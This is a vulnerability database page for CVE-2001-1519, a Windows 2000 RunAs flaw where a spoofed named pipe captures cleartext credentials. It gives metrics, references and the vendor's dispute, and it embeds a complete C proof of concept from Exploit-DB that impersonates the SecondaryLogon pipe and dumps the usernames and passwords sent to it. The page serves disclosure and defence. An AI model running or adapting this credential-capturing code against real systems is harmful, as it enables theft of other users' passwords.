CVE-2001-1519 : Detail

CVE-2001-1519

2.63%V4
Local
2005-07-14
04h00 +00:00
2024-09-16
22h03 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

RunAs (runas.exe) in Windows 2000 allows local users to create a spoofed named pipe when the service is stopped, then capture cleartext usernames and passwords when clients connect to the service. NOTE: the vendor disputes this issue, saying that administrative privileges are already required to exploit it

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 3.6 AV:L/AC:L/Au:N/C:P/I:P/A:N nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 21069

Publication date : 2001-12-10 23h00 +00:00
Author : Camisade
EDB Verified : Yes

// source: https://www.securityfocus.com/bid/3185/info The Windows 2000 RunAs service allows an application or service to be executed as a different user. It is accessed by holding down the shift key and right mouse clicking on an icon, then selecting 'Run as...' from the context menu. When the RunAs service is invoked, it creates a named pipe for client for communication of credentials (in cleartext). If the RunAs service is stopped, the attacker can create a named pipe with the same name to which credentials will be communicated when another user tries to use 'RunAs'. // radix1112200101.c - Camisade - Team RADIX - 11-12-2001 // // Camisade (www.camisade.com) is not responsible for the use or // misuse of this proof of concept source code. #define WIN32_LEAN_AND_MEAN #define UNICODE #define _UNICODE #include <windows.h> #include <tchar.h> #include <stdio.h> #define MAX_IN_BUF 0x1000 #define MAX_OUT_BUF 0x4 #define MAX_INST 0xA #define SECONDARY_LOGON_PIPE _T("\\\\.\\pipe\\SecondaryLogon") void main() { HANDLE hPipe; hPipe = CreateNamedPipe(SECONDARY_LOGON_PIPE, PIPE_ACCESS_DUPLEX, PIPE_TYPE_BYTE|PIPE_WAIT, MAX_INST, MAX_OUT_BUF, MAX_IN_BUF, NMPWAIT_USE_DEFAULT_WAIT, 0); if (hPipe == INVALID_HANDLE_VALUE) { printf("Can't create secondary logon pipe. Error %d\n", GetLastError()); return; } printf("Created pipe and waiting for clients...\n"); if (ConnectNamedPipe(hPipe, 0)) { UCHAR InBuf[MAX_IN_BUF]; DWORD dwReadCount; while (ReadFile(hPipe, InBuf, MAX_IN_BUF, &dwReadCount, 0)) { printf("Read %d bytes. (ASCII Dump)\n", dwReadCount); DWORD dwPos; for (dwPos = 0; dwPos < dwReadCount; dwPos++) { printf("%c ", InBuf[dwPos]); if ((dwPos % 16) == 0) printf("\n"); } DWORD dwReply = ERROR_ACCESS_DENIED; DWORD dwWroteCount; WriteFile(hPipe, &dwReply, sizeof(DWORD), &dwWroteCount, 0); } } DisconnectNamedPipe(hPipe); CloseHandle(hPipe); }

Products Mentioned

Configuraton 0

Microsoft>>Windows_2000 >> Version *

References

http://online.securityfocus.com/archive/1/240136
Tags : mailing-list, x_refsource_BUGTRAQ
http://online.securityfocus.com/archive/1/236111
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.securityfocus.com/bid/3185
Tags : vdb-entry, x_refsource_BID